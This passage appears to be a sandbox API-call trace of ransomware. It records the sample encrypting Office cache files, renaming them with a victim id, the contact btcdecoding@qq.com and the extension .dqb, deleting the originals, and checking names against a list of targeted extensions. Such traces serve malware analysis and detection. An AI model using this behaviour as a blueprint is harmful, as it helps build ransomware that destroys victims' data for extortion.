users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordlr.cab.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0037.294] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordlr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordlr.cab.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 1 [0037.435] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordlr.cab.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0037.435] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc6c | out: lpNewFilePointer=0x0) returned 1 [0037.436] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc2c | out: lpNewFilePointer=0x0) returned 1 [0037.436] ReadFile (in: hFile=0x18c, lpBuffer=0x3970058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2dbfc38, lpOverlapped=0x0 | out: lpBuffer=0x3970058*, lpNumberOfBytesRead=0x2dbfc38*=0x40000, lpOverlapped=0x0) returned 1 [0037.444] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0xdecf3f, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc2c | out: lpNewFilePointer=0x0) returned 1 [0037.444] ReadFile (in: hFile=0x18c, lpBuffer=0x39b0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2dbfc38, lpOverlapped=0x0 | out: lpBuffer=0x39b0058*, lpNumberOfBytesRead=0x2dbfc38*=0x40000, lpOverlapped=0x0) returned 1 [0037.454] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x2dbfc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0037.454] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x2986dbd, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc2c | out: lpNewFilePointer=0x0) returned 1 [0037.454] ReadFile (in: hFile=0x18c, lpBuffer=0x39f0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2dbfc38, lpOverlapped=0x0 | out: lpBuffer=0x39f0058*, lpNumberOfBytesRead=0x2dbfc38*=0x40000, lpOverlapped=0x0) returned 1 [0037.468] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfec8 | out: lpNewFilePointer=0x0) returned 1 [0037.468] WriteFile (in: hFile=0x18c, lpBuffer=0x3970020*, nNumberOfBytesToWrite=0xc0100, lpNumberOfBytesWritten=0x2dbfcb0, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesWritten=0x2dbfcb0*=0xc0100, lpOverlapped=0x0) returned 1 [0037.482] SetEndOfFile (hFile=0x18c) returned 1 [0037.482] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x40000) returned 0x3fea4f0 [0037.482] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc7c | out: lpNewFilePointer=0x0) returned 1 [0037.482] WriteFile (in: hFile=0x18c, lpBuffer=0x3fea4f0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2dbfc88, lpOverlapped=0x0 | out: lpBuffer=0x3fea4f0*, lpNumberOfBytesWritten=0x2dbfc88*=0x40000, lpOverlapped=0x0) returned 1 [0037.483] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0xdecf3f, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc7c | out: lpNewFilePointer=0x0) returned 1 [0037.483] WriteFile (in: hFile=0x18c, lpBuffer=0x3fea4f0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2dbfc88, lpOverlapped=0x0 | out: lpBuffer=0x3fea4f0*, lpNumberOfBytesWritten=0x2dbfc88*=0x40000, lpOverlapped=0x0) returned 1 [0037.485] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x2986dbd, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc7c | out: lpNewFilePointer=0x0) returned 1 [0037.485] WriteFile (in: hFile=0x18c, lpBuffer=0x3fea4f0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2dbfc88, lpOverlapped=0x0 | out: lpBuffer=0x3fea4f0*, lpNumberOfBytesWritten=0x2dbfc88*=0x40000, lpOverlapped=0x0) returned 1 [0037.487] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3fea4f0 | out: hHeap=0x570000) returned 1 [0037.487] CloseHandle (hObject=0x18c) returned 1 [0039.764] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0039.764] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned 73 [0039.764] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned 73 [0039.764] lstrlenW (lpString=".doc") returned 4 [0039.764] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0039.764] lstrlenW (lpString=".docx") returned 5 [0039.764] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0039.764] lstrlenW (lpString=".pdf") returned 4 [0039.764] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0039.765] lstrlenW (lpString=".xls") returned 4 [0039.765] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0039.765] lstrlenW (lpString=".xlsx") returned 5 [0039.765] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0039.765] lstrlenW (lpString=".ppt") returned 4 [0039.765] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0039.765] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned 73 [0039.765] lstrlenW (lpString=".zip") returned 4 [0039.765] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0039.765] lstrlenW (lpString=".rar") returned 4 [0039.765] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0039.765] lstrlenW (lpString=".bz2") returned 4 [0039.765] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0039.765] lstrlenW (lpString=".7z") returned 3 [0039.765] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0039.765] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned 73 [0039.765] lstrlenW (lpString=".dbf") returned 4 [0039.765] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0039.765] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned 73 [0039.765] lstrlenW (lpString=".1cd") returned 4 [0039.765] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0039.765] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned 73 [0039.765] lstrlenW (lpString=".jpg") returned 4 [0039.765] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0039.765] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned 73 [0039.765] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned 73 [0039.765] lstrlenW (lpString=".doc") returned 4 [0039.765] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0039.765] lstrlenW (lpString=".docx") returned 5 [0039.765] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0039.765] lstrlenW (lpString=".pdf") returned 4 [0039.765] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0039.765] lstrlenW (lpString=".xls") returned 4 [0039.766] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0039.766] lstrlenW (lpString=".xlsx") returned 5 [0039.766] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0039.766] lstrlenW (lpString=".ppt") returned 4 [0039.766] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0039.766] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned 73 [0039.766] lstrlenW (lpString=".zip") returned 4 [0039.766] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0039.766] lstrlenW (lpString=".rar") returned 4 [0039.766] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0039.766] lstrlenW (lpString=".bz2") returned 4 [0039.766] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0039.766] lstrlenW (lpString=".7z") returned 3 [0039.766] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0039.766] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned 73 [0039.766] lstrlenW (lpString=".dbf") returned 4 [0039.766] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0039.766] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned 73 [0039.766] lstrlenW (lpString=".1cd") returned 4 [0039.766] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0039.766] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned 73 [0039.766] lstrlenW (lpString=".jpg") returned 4 [0039.766] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0039.766] lstrcmpiW (lpString1=".msi", lpString2=".dqb") returned 1 [0039.766] lstrlenW (lpString="Proof.msi") returned 9 [0039.766] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0040.147] GetFileSizeEx (in: hFile=0x1f4, lpFileSize=0x2dbff1c | out: lpFileSize=0x2dbff1c*=885760) returned 1 [0040.147] CloseHandle (hObject=0x1f4) returned 1 [0040.147] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.msi")) returned 0x2020 [0040.148] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.msi.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0040.148] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0040.148] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfec8 | out: lpNewFilePointer=0x0) returned 1 [0040.148] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfec8 | out: lpNewFilePointer=0x0) returned 1 [0040.148] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.msi.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0040.148] GetLastError () returned 0x0 [0040.148] ReadFile (in: hFile=0x1f4, lpBuffer=0x3970020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2dbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesRead=0x2dbfed4*=0xd8400, lpOverlapped=0x0) returned 1 [0040.284] WriteFile (in: hFile=0x178, lpBuffer=0x3970020*, nNumberOfBytesToWrite=0xd8410, lpNumberOfBytesWritten=0x2dbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesWritten=0x2dbfc9c*=0xd8410, lpOverlapped=0x0) returned 1 [0040.678] ReadFile (in: hFile=0x1f4, lpBuffer=0x3970020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2dbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesRead=0x2dbfed4*=0x0, lpOverlapped=0x0) returned 1 [0040.678] WriteFile (in: hFile=0x178, lpBuffer=0x3970020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2dbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesWritten=0x2dbfc9c*=0xe6, lpOverlapped=0x0) returned 1 [0040.678] SetEndOfFile (hFile=0x178) returned 1 [0040.678] CloseHandle (hObject=0x178) returned 1 [0040.684] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfec8 | out: lpNewFilePointer=0x0) returned 1 [0040.684] SetEndOfFile (hFile=0x1f4) returned 1 [0040.691] CloseHandle (hObject=0x1f4) returned 1 [0040.691] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0040.691] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.msi")) returned 1 [0040.692] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned 81 [0040.692] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned 81 [0040.692] lstrlenW (lpString=".doc") returned 4 [0040.692] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0040.692] lstrlenW (lpString=".docx") returned 5 [0040.692] lstrcmpiW (lpString1=".docx", lpString2="f.msi") returned -1 [0040.692] lstrlenW (lpString=".pdf") returned 4 [0040.692] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0040.692] lstrlenW (lpString=".xls") returned 4 [0040.692] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0040.692] lstrlenW (lpString=".xlsx") returned 5 [0040.692] lstrcmpiW (lpString1=".xlsx", lpString2="f.msi") returned -1 [0040.692] lstrlenW (lpString=".ppt") returned 4 [0040.692] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0040.692] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned 81 [0040.692] lstrlenW (lpString=".zip") returned 4 [0040.692] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0040.692] lstrlenW (lpString=".rar") returned 4 [0040.692] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0040.692] lstrlenW (lpString=".bz2") returned 4 [0040.692] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0040.692] lstrlenW (lpString=".7z") returned 3 [0040.692] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0040.692] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned 81 [0040.692] lstrlenW (lpString=".dbf") returned 4 [0040.692] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0040.692] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned 81 [0040.692] lstrlenW (lpString=".1cd") returned 4 [0040.692] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0040.692] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned 81 [0040.692] lstrlenW (lpString=".jpg") returned 4 [0040.693] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0040.693] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned 81 [0040.693] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned 81 [0040.693] lstrlenW (lpString=".doc") returned 4 [0040.693] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0040.693] lstrlenW (lpString=".docx") returned 5 [0040.693] lstrcmpiW (lpString1=".docx", lpString2="f.msi") returned -1 [0040.693] lstrlenW (lpString=".pdf") returned 4 [0040.693] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0040.693] lstrlenW (lpString=".xls") returned 4 [0040.693] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0040.693] lstrlenW (lpString=".xlsx") returned 5 [0040.693] lstrcmpiW (lpString1=".xlsx", lpString2="f.msi") returned -1 [0040.693] lstrlenW (lpString=".ppt") returned 4 [0040.693] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0040.693] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned 81 [0040.693] lstrlenW (lpString=".zip") returned 4 [0040.693] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0040.693] lstrlenW (lpString=".rar") returned 4 [0040.693] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0040.693] lstrlenW (lpString=".bz2") returned 4 [0040.693] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0040.693] lstrlenW (lpString=".7z") returned 3 [0040.693] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0040.693] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned 81 [0040.693] lstrlenW (lpString=".dbf") returned 4 [0040.693] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0040.693] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned 81 [0040.693] lstrlenW (lpString=".1cd") returned 4 [0040.693] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0040.693] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned 81 [0040.693] lstrlenW (lpString=".jpg") returned 4 [0040.693] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0040.694] lstrcmpiW (lpString1=".msi", lpString2=".dqb") returned 1 [0040.694] lstrlenW (lpString="Proofing.msi") returned 12 [0040.694] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0040.694] GetFileSizeEx (in: hFile=0x1f4, lpFileSize=0x2dbff1c | out: lpFileSize=0x2dbff1c*=868864) returned 1 [0040.694] CloseHandle (hObject=0x1f4) returned 1 [0040.696] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.msi")) returned 0x2020 [0040.696] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.msi.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0040.696] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0040.696] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfec8 | out: lpNewFilePointer=0x0) returned 1 [0040.696] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfec8 | out: lpNewFilePointer=0x0) returned 1 [0040.696] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.msi.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0040.696] GetLastError () returned 0x0 [0040.696] ReadFile (in: hFile=0x1f4, lpBuffer=0x3970020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2dbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesRead=0x2dbfed4*=0xd4200, lpOverlapped=0x0) returned 1 [0040.712] WriteFile (in: hFile=0x178, lpBuffer=0x3970020*, nNumberOfBytesToWrite=0xd4210, lpNumberOfBytesWritten=0x2dbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesWritten=0x2dbfc9c*=0xd4210, lpOverlapped=0x0) returned 1 [0041.045] ReadFile (in: hFile=0x1f4, lpBuffer=0x3970020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2dbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesRead=0x2dbfed4*=0x0, lpOverlapped=0x0) returned 1 [0041.045] WriteFile (in: hFile=0x178, lpBuffer=0x3970020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2dbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesWritten=0x2dbfc9c*=0xec, lpOverlapped=0x0) returned 1 [0041.045] SetEndOfFile (hFile=0x178) returned 1 [0041.046] CloseHandle (hObject=0x178) returned 1 [0041.053] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfec8 | out: lpNewFilePointer=0x0) returned 1 [0041.053] SetEndOfFile (hFile=0x1f4) returned 1 [0041.060] CloseHandle (hObject=0x1f4) returned 1 [0041.060] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0041.060] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.msi")) returned 1 [0041.061] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned 75 [0041.061] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned 75 [0041.061] lstrlenW (lpString=".doc") returned 4 [0041.061] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0041.061] lstrlenW (lpString=".docx") returned 5 [0041.061] lstrcmpiW (lpString1=".docx", lpString2="g.msi") returned -1 [0041.061] lstrlenW (lpString=".pdf") returned 4 [0041.061] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0041.061] lstrlenW (lpString=".xls") returned 4 [0041.061] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0041.061] lstrlenW (lpString=".xlsx") returned 5 [0041.061] lstrcmpiW (lpString1=".xlsx", lpString2="g.msi") returned -1 [0041.061] lstrlenW (lpString=".ppt") returned 4 [0041.061] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0041.061] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned 75 [0041.061] lstrlenW (lpString=".zip") returned 4 [0041.061] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0041.061] lstrlenW (lpString=".rar") returned 4 [0041.061] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0041.061] lstrlenW (lpString=".bz2") returned 4 [0041.061] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0041.061] lstrlenW (lpString=".7z") returned 3 [0041.061] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0041.061] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned 75 [0041.061] lstrlenW (lpString=".dbf") returned 4 [0041.061] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0041.061] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned 75 [0041.061] lstrlenW (lpString=".1cd") returned 4 [0041.061] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0041.061] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned 75 [0041.061] lstrlenW (lpString=".jpg") returned 4 [0041.061] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0041.061] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned 75 [0041.062] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned 75 [0041.062] lstrlenW (lpString=".doc") returned 4 [0041.062] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0041.062] lstrlenW (lpString=".docx") returned 5 [0041.062] lstrcmpiW (lpString1=".docx", lpString2="g.msi") returned -1 [0041.062] lstrlenW (lpString=".pdf") returned 4 [0041.062] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0041.062] lstrlenW (lpString=".xls") returned 4 [0041.062] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0041.062] lstrlenW (lpString=".xlsx") returned 5 [0041.062] lstrcmpiW (lpString1=".xlsx", lpString2="g.msi") returned -1 [0041.062] lstrlenW (lpString=".ppt") returned 4 [0041.062] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0041.062] lstrlenW 